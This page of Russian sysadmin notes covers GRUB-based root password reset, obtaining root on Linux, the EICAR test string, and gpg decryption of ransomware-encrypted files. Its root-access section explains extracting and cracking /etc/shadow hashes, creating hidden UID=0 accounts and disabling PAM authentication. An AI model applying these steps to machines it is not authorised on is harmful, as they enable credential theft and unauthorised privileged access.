Привет коллеги! Сегодня понадобилось сбросить пароль для root пользователя в Unix системе Debian т.к. его все напрочь забыли. И так: 1) Перезагружаем Debian. 2) В момент отображения grub-boot loader screen выбираем вторую строчку в которой написано загрузка в single user mode и жмем e для редактирования параметров загрузки. 3) В следующем окне выбираем строчку, начинающуюся со слова kernel, встаем на нее и снова жмем e чтобы ее отредактировать. 4) Перемещаемся в конец строки и через пробел дописываем init=/bin/bash, затем жмем Enter чтобы выйти из режима редактирования. 5) Снова перемещаемся на строчку, начинающуюся с Kernel и жмем b для загрузки в Single User mode. Проделанные модификации загрузчика позволят произвести загрузку ядра и запустить /bin/bash в рамках стандартной загрузки. Это позволит дать нам привилегии рута, а так же сменить пароль на root. 6) Вводим следующий код: mount -rw -o remount / passwd root reboot |
Reset password debian 2
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
Добрый день. Если вы забыли пароль root что же делать? Можно ли как-нибудь восстановить пароль root в Linux? Ответ да можно и иногда даже несколькими способами :) договоримся сразу что я имею физический доступ к консоли компьютера и расматриваю дистрибутив ASP linux 11.2 kernel 2.6.17 (на основе Red Hat 4.0.2-8) посмотреть какая операционая система запушена можно двумя способами выполнив команду $uname -a или команду cat /proc/version. Немножко теории: /etc/passwd — файл, содержащий в текстовом формате список пользовательских учётных записей. Каждая строка файла описывает одного пользователя и содержит семь полей, разделённых двоеточиями: login : password : UID : GID : GECOS : home : shell root:lZTB0KTrSKy8M:0:0:root:/root:/bin/sh 1. регистрационное имя, или логин; 2. хеш пароля (см. ниже); 3. идентификатор пользователя; 4. идентификатор группы по умолчанию; 5. информационное поле GECOS*; 6. начальный (он же домашний) каталог; 7. регистрационная оболочка, или shell. |
Файл passwd
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
Основным назначением /etc/passwd является сопоставление логина(login) и идентификатора пользователя (UID). Изначально поле пароля содержало хеш пароль и использовалось для аутентификации. Однако, в связи с ростом вычислительных мощностей процессоров появилась серьёзная угроза применения простого перебора для взлома пароля. Поэтому все пароли были перенесены в специальные файлы, такие как /etc/shadow в GNU/Linux или /etc/master.passwd во FreeBSD. Эти файлы недоступны для чтения обычным пользователям. Такой подход называется механизмом скрытых паролей. В файле /etc/shadow хранятся хеши паролей всех пользователей в системе. Процессы суперпользователя могут читать его напрямую, а для остальных создана специальная библиотека PAM. Она позволяет непривилегированным приложениям спрашивать у неё, правильный ли пароль ввёл пользователь, и получать ответ. Таким образом, хеш не попадает «в чужие руки». Дело в том, что злоумышленник, имея набор хешей, всегда может осуществить атаку путём перебора паролей. Например, слова из словаря являются ненадёжными паролями, так как можно зашифровать словарь целиком и поискать хеши в том, что получится. Одна из наилучших программ, выполняющих такого рода атаки — John The Ripper. Также весьма популярна утилита crack. Фрагмент файла /etc/shadow login : хеш-password : .... john:13$80l1AVB5$6AdyTstdHpsSTsewiac8O1:13283:0:31:3:14:13514: От теории к практике: Процесс получения прав root делится на 2 этапа - получение доступа(чтения и/или записи) к файлам /etc/passwd и /etc/shadow и в зависимости от того какой вы получили доступ к файлам проделываем не хитрые махенации с системой: 1) допустим у нас доступ на чтение тогда выдергиваем хеш-пароль из /etc/passwd root:lZTB0KTrSKy8M:0:0:root:/root:/bin/sh - lZTB0KTrSKy8M, если в нем нет пароля в моем случае x свидетельствует что используется механизм скрытых паролей root:x:0:0:root:/root:/bin/sh то обращаемся к файлу /etc/shadow root:13$/Xhw3kaR$Vif2djTL4aQshu8aKfkl0/:12545:0:99999:7::: - 13$/Xhw3kaR$Vif2djTL4aQshu8aKfkl0/ далее получив хеш-пароль мы должны его расшифровать точне осуществить атаку путём перебора паролей с помощью программ типа John The Ripper, Slurpie или crack. John The Ripper — быстрая и гибкая программа подбора пароля. Она может использовать несколько списков слов и подбирать пароль методом грубой силы. Она доступна по адресу http://www.openwall.com/john/. Crack — возможно, наиболее известная программа взлом паролей. Crack также очень быстрая программа, хотя и не так проста в использовании, как John The Ripper. Её можно найти по адресу http://google.com/. :) Slurpie — программа Slurpie похожа на John The Ripper и Crack, но она рассчитана на работу сразу на нескольких компьютерах, и позволяет провести распределённый взлом пароля. Её, а также другие средства организации распределённой атаки, можно найти по адресу http://www.ussrback.com/distributed.htm. 2) допустим у нас доступ на чтение/запись тогда можно: а)сменить идентификатор пользователя (UID) у которого вы случайно не забыли пароль как все мы помним в системе могут существовать несколько пользователей с одним идентификатором(UID). Это нередко используется взломщиками, когда они после проникновения в систему создают себе учётную запись с UID=0. В результате они выглядят как обычные пользователи, но на самом деле имеют права root. b)стереть хеш-пароль в /etc/passwd или в /etc/shadow то есть 'обнулить' его или встаить хеш-пароль пользователя у которого вы случайно не забыли пароль. c)отключить аутенфикацию паролей в системе если я не ошибаюсь то делается это так в файле /etc/pam.d/passwd коментируем строчку #password required pam_stack.so service=system-auth. d)тупо ввести команду #passwd root. Процесс получения доступа 1) Грузимся с какого-либо LiveCD/flash/дискетки и восстанавливаемся... Надеюсь, файловые системы не шифрованы :) 2) Можно загрузится с инсталляционного диска. А дальше смонтировать корень поставленного линукса например в /mnt и chroot /mnt после чего passwd или текстовый редактор на /etc/shadow в помощь :) 3) Если нет(или не забыл) пароля на загрузчик, то передаем ядру init=/bin/bash, если нужно перемонтируй раздел в rw, смени пароль, обратно в ro и reboot. На своей машине я делал так, нажал "a" при выборе партиции в grub и дописал init=/bin/bash ч/з 10 сек в консоли :) 4) Загружайся в single user. В 9-ом редхате при загрузке в single user получаешь рутовскую консоль без пароля но в ASP 11.2 запрашивает пароль рута нажал "a" при выборе партиции в grub и дописал s 5) Задаем другой root-partition грузимся с другого раздела root=/dev/sda2 6) При загрузке grub нажать "c" попадаем в командную строчку и cat /etc/passwd :) |
|
1 2 3 4 5 6 7 8 9 |
EICAR - тест антивирусов EICAR virus test - безобидный тест, определяемый большинством антивирусов в качестве заразы. Используется для проверки работоспособности защитных программ. Достаточно создать файл, содержащий следующую последовательность: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* У меня сработал прямо на создании .txt файла, однако можно дальше переименовать его в .com и попробовать запустить, отправить себе по почте и т.д. |
Источники:
|
1 2 3 4 5 |
http://www.windowsfaq.ru/content/view/260/57/ http://www.cyberforum.ru/cmd-bat/thread259292.html http://forum.sys-admin.kz/index.php?topic=801.0 http://poplinux.ru/node/68 gpg ШИФРОВАНИЕ РАСШИФРОВКА https://www.nomoreransom.org/ru/index.html - тут можно найти дешифратор |
Что?
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
А id ключа смотрели? У нас было все зашифровано 15го, расшифровали через 8 дней, т.е. сегодня Команда: gpg2 -d key.private Нужное ПО: gpg4win. Расшифровка gpg --import UNCRYPT.KEY for /R %x in (*.paycrypt@gmail_com) do ren "%x" *.gpg for /R %x in (*.gpg) do gpg --batch --passphrase "paycrypt" --no-verbose --decrypt-files "%x" for /R %x in (*.gpg) do DEL /Q /F "%x" ipconfig.exe>>output.log 2>&1 Шифрование файла с помощью ключа В данном случае нужно понимать, что вы можете зашифровать файл как для самого себя, так и для кого-либо, если укажете идентификатор (e-mail или ID ключа) другого человека. Вы можете одним разом зашифровать файлы для нескольких людей, в том числе и для себя. -e, encrypt gpg -e /путь/name Программа попросит ввести текущих получателей, вы должны ввести ID ключа получателя файла (или просто e-mail получателя) и нажать Enter Если после параметра -e вы поставите параметр -a, то программа сделает зашифрованный файл в кодировке ASCII, расшифрование файла в этом случае производится той же командой. Расшифрование файла, зашифрованного с помощью ключа gpg -o /путь/name --decrypt /путь/name.gpg Программа попросит ввести пароль к вашему ключу и создаст файл с именем name |